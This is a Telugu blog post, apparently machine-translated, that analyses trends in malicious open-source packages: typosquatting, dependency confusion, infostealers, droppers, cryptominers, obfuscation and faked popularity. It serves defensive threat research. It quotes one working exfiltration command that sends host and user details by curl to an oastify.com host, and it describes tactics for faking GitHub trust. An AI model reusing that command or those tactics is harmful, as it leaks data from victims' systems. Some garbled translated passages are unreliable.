హానికరమైన ప్యాకేజీలు 5

హానికరమైన ప్యాకేజీల నిర్మాణం: ధోరణులు ఏమిటి?

విషయ సూచిక

తప్పక చదవాల్సిన పోస్ట్‌లు

ఆసక్తికరమైన తాజా పోస్ట్‌లు

గత ఎపిసోడ్‌లో, ఓపెన్ సోర్స్ హానికరమైన ప్యాకేజీలు: సమస్యముప్పు కలిగించే శక్తులు ఎందుకంత అలా ఉన్నాయో మేము చర్చించాము కొత్త హానికరమైన భాగాలను ప్రచురించడానికి లేదా ఇప్పటికే ఉన్న భాగాల తాజా వెర్షన్‌లలో మాల్వేర్‌ను చొప్పించడానికి ఉత్సాహం: ఓపెన్ సోర్స్ మౌలిక సదుపాయాలు ఎక్కడైనా ఎవరికైనా తాత్కాలిక ఖాతాను సృష్టించడానికి అనుమతిస్తాయి ఒక కాంపోనెంట్ రిజిస్ట్రీలో (NPM, PyPI, Docker Hub లేదా Visual Studio Marketplace వంటివి) లేదా సహకార అభివృద్ధి ప్లాట్‌ఫారమ్‌లో (GitHub వంటిది). ఖర్చు సున్నా, మరియు థర్డ్-పార్టీ కాంపోనెంట్‌లపై సాఫ్ట్‌వేర్ బృందాలకు ఉండే అధిక నమ్మకాన్ని ఉపయోగించుకోవడానికి అనేక అవకాశాలు ఉన్నాయి. 

ఓపెన్ సోర్స్ కోసం అందుబాటులో ఉన్న మౌలిక సదుపాయాలను ఉపయోగించి దాడి చేసేవారు మాల్వేర్‌ను వ్యాప్తి చేయడం ఎంత సులభమో, మరియు సాఫ్ట్‌వేర్‌ను అభివృద్ధి చేసే సంస్థలు (అందరూ?) మాల్వేర్ బారిన పడకుండా ఉండటం (మరియు వారు ఇతరుల కోసం పంపిణీ చేసే సాఫ్ట్‌వేర్‌లో మాల్వేర్‌ను చేర్చడం) ఎంత కష్టమో అనే ఈ రెండింటి మధ్య ఉన్న అసమానత, గత సంవత్సరం హానికరమైన ప్యాకేజీల సంఖ్య పావు మిలియన్ మార్కుకు దాదాపుగా చేరడానికి దారితీసింది. 

ఇది ఎంతటి తీవ్రమైన సమస్య అంటే, దీనిని ఏ ఒక్క సంస్థ కూడా పరిష్కరించలేదు, మరియు కమ్యూనిటీ విశ్వాసం, సెక్యూర్-బై-డిఫాల్ట్ మరియు సెక్యూర్-బై-డిజైన్ సూత్రాలు, ఇంకా కాంపోనెంట్ల లైఫ్‌సైకిల్‌కు సంబంధించి ఓపెన్ సోర్స్ ప్రక్రియను పునర్నిర్వచించే ప్రక్రియలో ఉంది. మనం తదుపరి ఎపిసోడ్‌లో అటువంటి ఆలోచనలను పరిశీలిస్తాము. ఓపెన్ సోర్స్ హానికరమైన ప్యాకేజీల నుండి రక్షణ: ఏది (పనిచేయదు).

మనం చాలా వరకు అనుగుణంగా ఉండే సాఫ్ట్‌వేర్ భాగాల గురించి మాట్లాడుతున్నామని గుర్తుంచుకోండి సాఫ్ట్‌వేర్ ప్యాకేజీలు: పునర్వినియోగించదగిన కాంపోనెంట్‌లు సాఫ్ట్‌వేర్ మానిఫెస్ట్‌లో డిపెండెన్సీగా సూచించబడేలా మరియు ప్యాకేజీ మేనేజర్ లేదా బిల్డ్ టూల్‌తో ఇన్‌స్టాల్ చేయబడేలా ప్యాక్ చేయబడ్డాయి. దయచేసి గమనించండి, ఈ సందర్భాన్ని పబ్లిక్‌ను చేర్చడానికి విస్తరించవచ్చు. కంటైనర్ చిత్రాలు (కంటైనర్ రన్‌టైమ్‌లు మరియు కుబెర్నెటెస్ వంటి ఆర్కెస్ట్రేషన్ ప్లాట్‌ఫారమ్‌ల ద్వారా ఉపయోగించబడుతుంది), మరియు సాఫ్ట్‌వేర్ సాధనాలకు పొడిగింపులు (నిర్మాణం, ఆటోమేషన్ మరియు విస్తరణ కోసం). 

ఇక్కడ మనం ఇది ఎలా ఉందో విశ్లేషిస్తాము హానికరమైన భాగాలపై ఆధారపడిన దాడి వ్యూహం గత ఉదాహరణల ప్రకారం మరియు మాల్వేర్ ముందస్తు హెచ్చరిక కోసం మా ప్లాట్‌ఫారమ్‌లో మేము చూసిన దాని ప్రకారం ఇది పనిచేస్తుంది (MEW). మేము హానికరమైన భాగాలను వివిధ కోణాల్లో విశ్లేషిస్తాము: 

(1) పంపిణీ కోసం ఎంచుకున్న మార్గం (కొత్త లేదా ఇప్పటికే ఉన్న భాగంలో ఉపయోగించిన రిజిస్ట్రీ, మరియు ప్రచురించబడిన భాగం సంస్కరణను సోకించడానికి ఉపయోగించే సాంకేతికత), (2) మాల్వేర్ ఎలా యాక్టివేట్ చేయబడుతుంది లేదా ట్రిగ్గర్ చేయబడుతుంది, (3) హానికరమైన ప్రవర్తన అంటే ఏ హానికరమైన చర్యలు గమనించబడ్డాయి మరియు దాడి చేసేవారి ప్రేరణ ఏమిటి, (4) అస్పష్టత, గుర్తించబడకుండా దాచడం, పార్శ్వ కదలిక, కమాండ్ మరియు కంట్రోల్ (C2) హోస్ట్‌లతో కమ్యూనికేషన్ మొదలైన వాటికి ఏ పద్ధతులు సాధారణంగా ఉపయోగించబడతాయి; మరియు (5) బాధితులు ఆ కాంపోనెంట్‌ను ఇన్‌స్టాల్ చేసేలా తగినంత ప్రజాదరణ మరియు నమ్మకాన్ని పొందే పద్ధతులు.

ఎంచుకున్న పంపిణీ విధానం

మనం ఒక “వెనుకవైపు శబ్ధంతమ డిపెండెన్సీ ప్యాకేజీ పేరులో అక్షరదోషం ఉపయోగించి, అజాగ్రత్తగా ఉండే డెవలపర్‌లను ఫిషింగ్ చేయడానికి టైపోస్క్వాటింగ్‌ను వాడే అధునాతనం కాని హానికరమైన ప్యాకేజీలు ఉంటాయి. కొంతమంది అజాగ్రత్తగా ఉండే డెవలపర్‌లను ఫిషింగ్ చేయాలనే అంచనాతో, అనేక ప్రముఖ ప్యాకేజీలు అక్షరదోషాలతో కూడిన, అదే విధమైన పేర్లు గల ప్యాకేజీల వెల్లువను ఎదుర్కొంటాయి. 

వారు ఒక తాత్కాలిక ఖాతాను ఉపయోగించి, టైపోస్క్వాట్ ప్యాకేజీల సమూహాన్ని ప్రచురించి, మరొకదాన్ని సృష్టించి, ఇంకొక సమూహాన్ని ప్రచురిస్తారు… కొంత ఆటోమేషన్ మరియు చాతుర్యాన్ని ఉపయోగించి వారు కొంత అధునాతనతను సాధించగలరు, కానీ సాధారణంగా అవి చాలా అల్పమైనవి. మేము అంతర్గతంగా వాటిని “ఆంకోవీస్క్రెడెన్షియల్స్ దొంగిలించడమే ప్రధాన లక్ష్యం, కానీ అప్పుడప్పుడు స్పైవేర్ సోర్స్ కోడ్ లేదా వ్యక్తిగతంగా గుర్తించదగిన సమాచారం (PII), క్లిప్‌బోర్డ్ క్యాప్చర్ మరియు ఇతర అనుమానాస్పద విషయాల వంటి సున్నితమైన డేటాను బయటకు పంపడాన్ని మనం గమనిస్తాము.

అకస్మాత్తుగా మనం మరింత అధునాతనమైన హానికరమైన భాగాలను, అంటే "షార్క్‌లను" చూస్తాము. వాటిలో ఒక మైనారిటీ నిర్దిష్ట సమూహాలను లేదా సంస్థలను లక్ష్యంగా చేసుకుంటాయి, సాధారణంగా షరతులతో కూడిన క్రిప్టో డ్రైనర్‌లు లేదా వెబ్ స్కిమ్మర్‌ల ద్వారా ఇవి పనిచేస్తాయి, బహుశా ఈ క్రింది విధానాన్ని అనుసరించి ఉండవచ్చు. ఈవెంట్-స్ట్రీమ్ సంఘటన లక్ష్య ప్యాకేజీ నుండి ప్యాకేజీని సూచించినప్పుడు మాత్రమే దాడి పేలోడ్‌ను డీక్రిప్ట్ చేయడం. 

పంపిణీ యంత్రాంగాన్ని అద్భుతమైన మరియు ఇప్పుడు క్లాసిక్ అయిన పత్రంలో విశ్లేషించారు,వెన్నుపోటుదారుడి కత్తి సేకరణ: ఓపెన్ సోర్స్ సాఫ్ట్‌వేర్ సరఫరా గొలుసు దాడుల సమీక్ష”, ఇది తప్పక చదవవలసినది. ఈ చక్కని చార్ట్‌ను మీరు ఇంతకు ముందే చూసి ఉంటారు: 

హానికరమైన ప్యాకేజీలు

కొత్త మరియు ఇప్పటికే ఉన్న ప్యాకేజీలతో సహా అన్ని మార్గాలను అన్వేషించారు; సోర్స్ కోడ్, బిల్డ్ సిస్టమ్ లేదా ప్యాకేజీ చేయబడిన కాంపోనెంట్‌ను ప్రభావితం చేయడం; దొంగిలించబడిన క్రెడెన్షియల్స్ లేదా సోషల్ ఇంజనీరింగ్‌ను ఉపయోగించడం; వదిలివేయబడిన ఖాతాలు మరియు రిపోజిటరీలను హైజాక్ చేయడం లేదా నిర్వహించబడుతున్న వాటిని విషపూరితం చేయడం వంటివి చేశారు. కొన్ని దాడులకు పేర్లు పెట్టారు (టైపోస్క్వాటింగ్, ఆధారపడటం గందరగోళం, స్పష్టమైన గందరగోళం, రెపో-జాకింగ్. మొదలైనవి) మరియు ఇప్పటికే ఇతరచోట్ల చర్చించబడ్డాయి. 

ఎంచుకున్న రిజిస్ట్రీల సంగతేంటి?

హానికరమైన ప్యాకేజీల మొత్తం సంఖ్యలో NPM అగ్రస్థానంలో కొనసాగుతోంది, కానీ ఈ సంవత్సరం నుండి PyPIలో వాటి సంఖ్య పెరగడాన్ని మేము గమనించాము. పైథాన్ అనేది డేటా సైన్స్ మరియు మెషిన్ లెర్నింగ్ కోసం ఒక ప్రసిద్ధ ఎకోసిస్టమ్. వాస్తవానికి, ఇప్పుడు NPM కంటే PyPIలోనే మాల్వేర్ సాంద్రత ఎక్కువగా ఉంది. 

మాల్వేర్ ఎలా ప్రేరేపించబడుతుంది

ప్రతి 10 కేసులలో కేవలం 4 కేసులలో మాత్రమే ఇన్‌స్టాలేషన్ సమయంలో హానికరమైన ప్యాకేజీలు ప్రేరేపించబడతాయి (ఇటీవలి సంవత్సరాలలో ఇది 10కి దాదాపు 6గా ఉండేది). మిగిలినవి రన్‌టైమ్‌లో హానికరమైన ప్రవర్తనను ప్రదర్శిస్తాయి, పరీక్షలను నడుపుతున్నప్పుడు ప్రతి 100 కేసులలో ఒకటి ప్రేరేపించబడుతుంది. అనేక చోట్ల ఇన్‌స్టాలేషన్ స్క్రిప్ట్‌ల అనియంత్రిత అమలు నిలిపివేయబడిందని శత్రువులకు తెలిసినట్లుగా ఉంది.

దుర్మార్గులకు ఏమి దక్కుతోంది?

మేము హానికరమైన ప్రవర్తన వర్గాలను, అత్యంత ప్రజాదరణ పొందిన వాటిని మొదటగా ఉంచి జాబితా చేస్తాము. ప్రభావం చాలా భిన్నంగా ఉండవచ్చని దయచేసి గమనించండి: a వైపర్ ఇది మొండిగా విధ్వంసకరమైనది, కానీ ఇది సర్వసాధారణం కాదు మరియు లక్షిత సైబర్ యుద్ధ ప్రచారాలు లేదా క్రూరమైన హ్యాక్టివిజంకు సంబంధించిన కొన్ని సందర్భాల్లో మాత్రమే కనిపించింది. కింది వర్గాలు చాలా సాధారణమైనవి:

  • ఇన్ఫోస్టీలర్ / క్రెడెన్షియల్స్ డ్రైనర్అత్యంత తరచుగా జరిగే, 90% కంటే ఎక్కువ అధునాతనం కాని దాడులు ప్రధానంగా పాస్‌వర్డ్‌లు, యాక్సెస్ టోకెన్‌లు, API కీలు మరియు ప్రైవేట్ కీలు (SSH మరియు అలాంటి వాటి కోసం) వంటి ఆధారాల కోసం వెతికే సాధారణ దొంగతనాలు. (వైపర్‌లతో పాటుగా?) దీన్ని రాయడం బహుశా చాలా సులభం. అవి తెలిసిన ఫైల్‌లు/డైరెక్టరీలు మరియు ఇతర మూలాలను (ఉదా. రిజిస్ట్రీ కీలు) జాబితా చేస్తాయి, వాటిలోని విషయాలను ప్యాకేజీ చేసి, ఆ డేటాను ఒక C2 సర్వర్‌కు పంపుతాయి. దీని వెనుక ఉన్న ఆలోచన చాలా సులభం: “ఫిషింగ్ ఆధారాల కోసం నేను ఒక దొంగను ప్రచురిస్తాను, తద్వారా ఆ ఆధారాలను ఉపయోగించి నేను తర్వాత ఒక నిర్దేశిత దాడిని ప్రారంభించగలను”. 

సాధారణంగా కనిపించే C2 నెట్‌వర్కింగ్ అనేది టెలిగ్రామ్ ఛానెల్స్ వంటి చౌకబారు మరియు నాసిరకమైనది. ఎన్‌గ్రాక్ లాంటి సొరంగం తవ్వే సాధనాలు (తరచుగా VPN ఎగ్రెస్‌ IPల ద్వారా బహిర్గతమయ్యే రివర్స్ ప్రాక్సీల రూపంలో). వందలాది (!) అవకాశాలు ఉన్నాయి, వీటి కింద అనేక గిట్‌హబ్ ప్రాజెక్ట్‌లు ఉన్నాయి. పాస్‌వర్డ్-దొంగ అంశంహానికరమైన ప్యాకేజీలు మరియు కంటైనర్ ఇమేజ్‌ల విషయంలో కీలాగర్‌ల వంటి ప్రత్యేకతలు అరుదుగా ఉంటాయి, కానీ వినియోగదారు పరస్పర చర్య అవసరమయ్యే టూల్ ఎక్స్‌టెన్షన్‌లలో ఇవి తరచుగా కనిపిస్తాయి.

  • డ్రాపర్ / డౌన్‌లోడర్జనాదరణలో రెండవ స్థానంలో ఉన్నప్పటికీ, ఇవి సాధారణంగా బహుళ-దశల దాడులలో మొదటి స్థానంలో ఉంటాయి. హానికరమైన భాగాలలో మూడింటిలో ఒకదాని కంటే ఎక్కువ వాటికి డ్రాపర్‌లు (ప్యాకేజీలోనే హానికరమైన పేలోడ్ చేర్చబడి ఉంటే) లేదా డౌన్‌లోడర్‌లు (దాడి చేసేవారి నియంత్రణలో ఉన్న ఎండ్‌పాయింట్ నుండి పేలోడ్ డౌన్‌లోడ్ చేయబడితే) ఉంటాయి. ఈ పేలోడ్ తరచుగా తెలిసిన బైనరీ మాల్వేర్ వేరియంట్ అయి ఉంటుంది, మరియు దీనిని బ్యాక్‌డోర్‌లు, స్పైవేర్, క్రిప్టో డ్రైనర్‌లు మరియు ఇతర ఉపయోగాల కోసం ఇన్‌స్టాల్ చేయడానికి రన్ చేస్తారు, కొన్నిసార్లు నిల్వ కూడా చేస్తారు. డౌన్‌లోడ్ చేయబడిన లేదా డిప్లాయ్ చేయబడిన పేలోడ్, ఇప్పటికే ఉన్న మాల్వేర్ బైనరీల ద్వారా అందించబడిన పూర్తి శక్తితో రెండవ దశ దాడిని ప్రారంభిస్తుంది. ఊహించని సైట్‌లకు కనెక్ట్ అయ్యేటప్పుడు గుర్తించబడకుండా ఉండటానికి, ఈ బైనరీలను ప్యాకేజీలోనే పంపిణీ చేయవచ్చు, తరచుగా వీటిని ఇమేజ్‌లుగా లేదా హానిచేయని ఫైల్ రకాలుగా మారువేషంలో ఉంచుతారు. 
  • క్రిప్టోకరెన్సీ దొంగలు / మైనర్లుఆర్థిక ప్రేరేపిత శత్రువులు క్రిప్టోమైనర్‌లను నడపడానికి మీ క్లౌడ్ ఆస్తులను ఉపయోగించుకోవడానికి సిద్ధంగా ఉన్నారు (అవి క్లౌడ్ VMలో నడుస్తున్నాయో లేదో కూడా వారు గుర్తిస్తారు). వారు దేని గురించి పట్టించుకోరు. తక్కువ లాభ నిష్పత్తి దొంగిలించబడిన క్లౌడ్ ఇన్‌ఫ్రాస్ట్రక్చర్ కోసం బాధితుడికి విధించిన ప్రతి $53కి $1 చొప్పున. బాధితులకు అనుకోని బిల్లు వచ్చే వరకు ఈ విషయం తెలియకపోవచ్చు. అదృష్టవశాత్తూ, ఇది వస్తూ పోతూ ఉంటుంది. Cryptojacking హానికరమైన ప్యాకేజీలలోని ప్రచారాలు అప్పుడప్పుడు ప్రత్యక్షమై, ఆపై మాయమవుతాయి. ఇవి వాలెట్ వినియోగదారులను ఫిషింగ్ చేయడానికి లేదా చివరికి వాలెట్ ప్రొవైడర్‌ను లక్ష్యంగా చేసుకోవడానికి ప్రయత్నిస్తాయి. లెడ్జర్ దాడి.   

ఇతర ప్రవర్తనలు, మోహరించడం వంటివి బ్యాక్డోర్ను రివర్స్ షెల్ తెరవడం ద్వారా రిమోట్ కోడ్ ఎగ్జిక్యూషన్ చేయడం గతంలో కంటే ఇప్పుడు తక్కువగా జరుగుతోంది. ఉదాహరణకు, 123rf_contributor_web ప్యాకేజీ (ఇప్పుడు రిజిస్ట్రీ నుండి తొలగించబడింది) నుండి కాపీ చేసి పేస్ట్ చేసిన రివర్స్ షెల్ ఎటువంటి అస్పష్టత లేకుండా తెరుచుకుంటుంది. రివర్స్ షెల్ చీట్ షీట్:

హానికరమైన ప్యాకేజీలు 2
2024 జూన్ 24-30 వారంలో హానికరమైన ప్యాకేజీ రకాలు గమనించబడ్డాయి.

చట్టబద్ధమైన మరియు హానికరమైన అంశాలతో పాటు, మేము అనేక దుర్వినియోగాలను గమనించాము, వాటిలో ఇవి ఉన్నాయి:

స్పామ్ ప్యాకేజీలు

NPMలో ఎక్కువగా వేలాది చిన్న ప్యాకేజీలు ఉన్నాయి, వాటిలో మాల్‌వేర్ ఏమీ ఉండదు కానీ సులభంగా డబ్బు సంపాదించవచ్చని, మోసపూరితమైన వాగ్దానాలు, వయాగ్రా ఆఫర్లకు లింకులు మరియు అలాంటివన్నీ ఉంటాయి. కొంతమంది వినియోగదారులు ఇలాంటి స్పామ్‌ను ప్రచురించి, రిజిస్ట్రీ నుండి చాలా బ్యాండ్‌విడ్త్‌ను తీసుకుంటారు. బహుశా ఇండోనేషియాకు చెందిన మరో వ్యక్తి(లు) ఈ క్రింది విధంగా ప్రయోజనం పొందడానికి ప్రయత్నించారు. టీ ర్యాంక్‌ను దుర్వినియోగం చేయడం పదివేల కొద్దీ పరస్పర సంబంధం ఉన్న NPM ప్యాకేజీలను, వాటికి సంబంధించిన GitHub డమ్మీ రిపోజిటరీలతో సృష్టించడం ద్వారా, ఓపెన్-సోర్స్ డెవలపర్‌లకు పరిహారం అందించాలనేది దీని ఉద్దేశం. ఇది వినియోగ నిబంధనలను స్పష్టంగా ఉల్లంఘించడమే.

బగ్ బౌంటీ మరియు భద్రతా పరిశోధన బూటకాలు

 ఒక ప్యాకేజీ, బగ్ బౌంటీ ప్రోగ్రామ్‌ల కోసం భద్రతా లోపాలను గుర్తించడం లేదా ఎకోసిస్టమ్‌లోని నిర్దిష్ట అంశాలపై పరిశోధన చేయడం వంటి మంచి ప్రయోజనాల కోసం డేటాను బయటకు పంపుతున్నట్లుగా తనను తాను వర్ణించుకుంటుంది. ఈ వర్గంలో మేము వేలాది ప్యాకేజీలను చూశాము, ఇవి పోర్ట్‌స్విగ్గర్ నుండి (ఉదా. oastify.com డొమైన్‌లోని హోస్ట్) బర్ప్ కొలాబరేటర్ చిరునామాకు గుర్తింపును పొందుతాయి కానీ మరీ సున్నితమైన డేటాను పొందవు. మేము తరచుగా వీటి నకళ్లను గమనించాము. ఆధారపడటం గందరగోళం అలెక్స్ బిర్సాన్ ద్వారా ప్రూఫ్-ఆఫ్-కాన్సెప్ట్, అరోరా-వెబ్‌మెయిల్-ప్రో ప్రీ-ఇన్‌స్టాల్ స్క్రిప్ట్‌లో ఈ చెడ్డ కోడ్‌ను అమలు చేసే ప్యాకేజీ (రిజిస్ట్రీ నుండి తీసివేయబడింది):

exec("a=$(hostname; pwd; whoami; echo 'aurora-webmail-pro'; curl http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/;) && echo $a | xxd -p | head | while read ut; do curl -k -i -s http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/$ut;done")  

మరియు ఒక “ఇది సరళమైన డిపెండెన్సీ కన్ఫ్యూజన్ అటాక్ ప్రూఫ్ ఆఫ్ కాన్సెప్ట్" నిరాకరణ వివరణ ప్యాకేజీ.జాసన్దురుద్దేశం లేకపోయినా కూడా, ఇది సేవా నిబంధనలను స్పష్టంగా ఉల్లంఘించడమే. 

ఒక శుభవార్త ఏమిటంటే? హానికరమైన భాగాల ద్వారా జరిగే రాన్సమ్‌వేర్ దాడులను మేము (ఇప్పటివరకు) చూడలేదు. తెలియని కారణాల వల్ల, సైబర్ నేరగాళ్లు సాంప్రదాయ ఈమెయిల్ ఫిషింగ్, RDP-ఆధారిత, మరియు డ్రైవ్-బై డౌన్‌లోడ్ డెలివరీ విధానాలను ఎక్కువగా ఇష్టపడుతున్నట్లు కనిపిస్తోంది. 

గమనించిన అదనపు పద్ధతులు 

హానికరమైన ప్యాకేజీలు 3

నిలకడ, రక్షణ తప్పించుకోవడం, సమాచార సేకరణ, కమాండ్ & కంట్రోల్ హోస్ట్‌లతో సంభాషణ, మరియు సమాచార బహిష్కరణ కోసం అనేక పద్ధతులు ఉపయోగించబడ్డాయి. 

పట్టుదల రెండవ-దశ బైనరీ మాల్వేర్‌లోని నిలకడ లక్షణాలను ఉపయోగించి హానికరమైన భాగాలలో గుర్తింపు పొందబడుతుంది, కానీ కొన్నిసార్లు ఈ ప్రవర్తన ప్యాకేజీ కోడ్‌లో ఉంటుంది, షెడ్యూల్ చేయబడిన పనులు మరియు విండోస్ రిజిస్ట్రీలోని మార్పులు అత్యంత సాధారణమైనవి. 

obfuscation ఇది సాధారణమే, కానీ అధునాతనమైనది కాదు. చాలా టైపోస్క్వాటింగ్ ప్యాకేజీలు ("గుర్తుంచుకోండి")ఆంకోవీస్అసలు అస్పష్టపరిచే పద్ధతులను ఉపయోగించరు; చాలామంది సాధారణమైన వాటిని (బేస్64/హెక్స్ ఎన్‌కోడింగ్ లేదా rot13 వంటి సబ్‌స్టిట్యూషన్ సైఫర్‌లు) ఉపయోగిస్తారు లేదా అందుబాటులో ఉన్న కోడ్ అస్పష్టపరిచే సాధనాలను మరియు మినిఫికేషన్‌ను వాడతారు, వీటిని సరైన సాధనాలతో సులభంగా రివర్స్ చేయవచ్చు. కేవలం "షార్క్‌లు" మాత్రమే నిజమైన, అత్యంత కఠినమైన, రివర్స్-ఇంజనీరింగ్ చేయడం కష్టమైన అస్పష్టపరిచే పద్ధతులను ఉపయోగిస్తారు.

అస్పష్టత దాడిని దాచిపెట్టగలదు, కానీ ఒక ఓపెన్-సోర్స్ కాంపోనెంట్‌లోని కోడ్‌ను ఎందుకు అస్పష్టం చేయాలి? స్పష్టంగా కనిపించకుండా ఏదైనా దాచాల్సిన అవసరం ఉందని రుజువు ఉందా? మేధో సంపత్తిని రక్షించడానికి అస్పష్టతను ఉపయోగించే హానికరమైనవి కాని ప్యాకేజీల యొక్క అనేక ఉదాహరణలను మేము కనుగొన్నాము, ఇది "ఓపెన్ సోర్స్"కు విరుద్ధం. అస్పష్టతను మాల్వేర్‌కు సాక్ష్యంగా ఉపయోగించవచ్చు, కానీ అది నిశ్చయాత్మకమైనది కాదు. అస్పష్టతను తొలగించడం కూడా కష్టం. 

ఎగవేత రక్షణ నియంత్రణల నుండి సరళమైన పద్ధతులను అవలంబిస్తుంది. హానికరమైన కోడ్ తరచుగా రక్షించబడుతుంది. ప్రయత్నించు … పట్టుకో ఏవైనా మినహాయింపులను విస్మరించే బ్లాక్‌లు, కాబట్టి అసాధారణ కార్యకలాపాలు లాగ్‌లలో చూపబడవు. ఒక నిర్దిష్ట సంస్థ లేదా వాతావరణాన్ని లక్ష్యంగా చేసుకునే మాల్వేర్ విషయంలో తప్ప, వాతావరణ ధృవీకరణ (VM లేదా కంటైనర్‌లో నడుస్తున్నది) అరుదుగా జరుగుతుంది.

చిత్రాలు మరియు PDF ఫైళ్ళలో బైనరీలను మభ్యపెట్టడం (ఒక రకమైన స్టెగానోగ్రఫీ) అనేది గుర్తింపును తప్పించుకోవడానికి కనిపించిన మరో పద్ధతి.

అత్యంత సాధారణ హానికరమైన అంశాలు సమాచార దొంగలు కాబట్టి, వివరాల సేకరణ ఇది చాలా అవసరం. రహస్యాలు (పాస్‌వర్డ్‌లు, యాక్సెస్ టోకెన్‌లు, API కీలు, క్రిప్టోగ్రాఫిక్ కీలు) లాగ్ ఫైల్స్, ఎన్విరాన్‌మెంట్ వేరియబుల్స్ మరియు క్లిప్‌బోర్డ్‌లో కూడా నిత్యం స్కాన్ చేయబడతాయి (బ్యాంకింగ్ ట్రోజన్‌లు మరియు క్రిప్టో స్టీలర్‌ల విషయంలో ఇది గమనించబడింది). సోర్స్ కోడ్ బహిర్గతం కావడం కూడా సర్వసాధారణం, ఎందుకంటే ప్యాకేజీ ఇన్‌స్టాలేషన్ తరచుగా డెవలప్‌మెంట్ నోడ్‌లో జరుగుతుంది, అక్కడ అంతర్గత గిట్ రిపోజిటరీలు క్లోన్ చేయబడి ఉండవచ్చు. గిట్ రిపోజిటరీల కోసం ప్యాకేజీలు డైరెక్టరీలను వెతకడాన్ని మేము చూశాము. .env, private.pem, settings.py, app.js, లేదా application.properties వంటి లొకేషన్‌ల కోసం వెతకడం చాలా సాధారణం.

డేటా వెలికితీత అనేది విస్తృతంగా ఉపయోగించే మరో చర్య. చాలా తక్కువ హానికరమైన ప్యాకేజీలు మాత్రమే వెలికితీసిన డేటా యొక్క గమ్యాన్ని దాచడానికి ప్రయత్నిస్తాయి. టెలిగ్రామ్ ఛానెళ్లు మరియు ఎన్‌గ్రోక్ లాంటి సొరంగాలు తరచుగా ఉపయోగించబడతాయి. మరియు చాలా ఉన్నాయి సాధారణంగా సమాచార లీకేజీ కోసం ఉపయోగించే వైట్‌లిస్ట్ చేయబడిన డొమైన్‌లు

ప్రివిలేజ్ ఎస్కలేషన్ లేదా లాటరల్ మూవ్‌మెంట్ వంటి ఇతర పద్ధతులు తక్కువగా వాడుకలో ఉండేవి. 

ప్రజాదరణ మరియు నమ్మకాన్ని పొందడం

చేతిలో సిద్ధంగా ఉన్న ఒక ప్రాణాంతకమైన హానికరమైన వస్తువుతో ఉన్న ఒక టెక్ నేరగాడు ఇలా ఆలోచిస్తున్నట్లు ఊహించుకోండి: “ఏమీ అనుమానించని ఆ మూర్ఖులకు ఈ చెత్తను ఎలా నమ్మదగినదిగా చేయాలి?”. 

దీని అర్థం ఏమిటంటే, హానికరమైన కాంపోనెంట్ కోసం ఎంట్రీని ఎలా సృష్టించాలి, తద్వారా అది ప్రజాదరణ కోసం అనేక స్టార్‌లు / ఫోర్క్‌లు, అలాగే వెర్షన్‌లు / సమస్యలను చూపుతుంది. pull requests (కార్యకలాపం కోసం). దీని ఉద్దేశ్యం కల్పిత ప్రజాదరణ (స్టార్స్) మరియు ఆధారపడిన వారిని సంపాదించడం, అలాగే ప్రాసంగికత మరియు నిర్వహణ విషయంలో నమ్మకమైన రూపాన్ని ప్రదర్శించడం. 

గిట్‌హబ్ ప్రాజెక్ట్‌లోని కంటెంట్‌లు మరియు ప్యాకేజీ కంటెంట్‌లు సరిపోలుతున్నాయో లేదో రిజిస్ట్రీ తనిఖీ చేయదు.ఇది సాఫ్ట్‌వేర్ సరఫరా గొలుసులో అందరికీ తెలిసిన సమస్య. పబ్లిక్ రిజిస్ట్రీలు అనేవి వాటిలో వేసిన ప్రతిదాన్నీ మింగేసే భారీ గొయ్యిల వంటివి. మీరు ఏ రిపోజిటరీనైనా లింక్ చేయవచ్చు. 

హానికరమైన ప్యాకేజీలు 4
2024 జూన్ 24-30 వారంలో సంభావ్య మాల్వేర్‌లో సాక్ష్యాల పంపిణీ.

హానికరమైన ప్యాకేజీ ఇప్పటికే జనాదరణ పొందిన రిపోజిటరీని తప్పుగా వాడుకుంటే, అది సులభం: ప్యాకేజీని సృష్టించడానికి మరియు దానిని రిజిస్ట్రీలో ప్రచురించడానికి ఉపయోగించే డిపెండెన్సీల మానిఫెస్ట్‌లో ఇప్పటికే ఉన్న GitHub రిపోజిటరీని సూచిస్తే సరిపోతుంది. నకిలీ GitHub రిపోలో కొత్త ప్యాకేజీల కోసం, మీకు మరింత చాకచక్యం అవసరం కావచ్చు, బహుశా నకిలీ రిపోజిటరీని సృష్టించాల్సి రావచ్చు. నక్షత్రాలను చూడటం/ఫోర్కింగ్ స్క్రిప్టింగ్ ద్వారా గిట్‌హబ్ ఖాతాలు.

మరియు మీ ప్యాకేజీలోని కంటెంట్‌లు రెపోలోని కంటెంట్‌లకు చాలా వరకు సారూప్యంగా ఉంటే, అక్కడక్కడా చక్కగా రూపొందించిన ఒకటి రెండు మార్పులు చొప్పించండి… మీరు ఇప్పటికే ఉన్న ప్యాకేజీ యొక్క రిపోజిటరీని సూచిస్తూ, ఒక ప్రసిద్ధ ప్యాకేజీని పోలిన కొత్త ప్యాకేజీలోకి మీ మాల్వేర్‌ను చొప్పించి, అందులోని అక్షరదోషాల కోసం వేచి ఉండవచ్చు. ఎవరైనా ప్యాకేజీ టార్‌బాల్‌లోని కంటెంట్‌లను గిట్‌హబ్ రిపోజిటరీలోని కంటెంట్‌లతో పోల్చి చూసే సాహసం చేస్తే, మాల్వేర్ చొప్పించిన చోట్ల ఉన్న తేడాలను సులభంగా గుర్తించలేకపోవచ్చు. మేము ఈ విధానాన్ని ఇంతకుముందు చాలాసార్లు చూశాము. 

ఒక విడిభాగం దాని మూలం గురించి, అంటే ఆ ప్యాకేజీని ఎలా, ఏ వనరుల నుండి, మరియు ఎవరు తయారు చేశారనే దాని గురించి, తారుమారు చేయలేని విధంగా ఒక ప్రకటన చేసే యంత్రాంగం ఉంటే బాగుంటుంది. కానీ అది వేరే విషయం. 

కాంపోనెంట్ X మాల్‌వేరా?

హానికరమైన ప్యాకేజీల (సమగ్రమైన) డేటాబేస్ ఉందా? లేదు. ఓపెన్-సోర్స్ బలహీనతలకు CVE ID కేటాయించబడింది, కానీ కొన్ని హానికరమైన ప్యాకేజీలకు (ముఖ్యంగా వార్తల్లో నిలిచే వాటికి) మాత్రమే ఒకటి ఇవ్వబడుతుంది. హానికరమైన ప్యాకేజీల కోసం CWE CWE-506 (హానికరమైన కోడ్ పొందుపరచబడింది). 

సాధారణ మాల్వేర్ టూల్స్ (వైరస్‌టోటల్, మాల్వేర్‌బజార్, సోరెల్-20M…) హానికరమైన భాగాల కోసం ప్రత్యేక ఏర్పాట్లు చేయవు. అలా చేస్తే బాగుంటుంది!

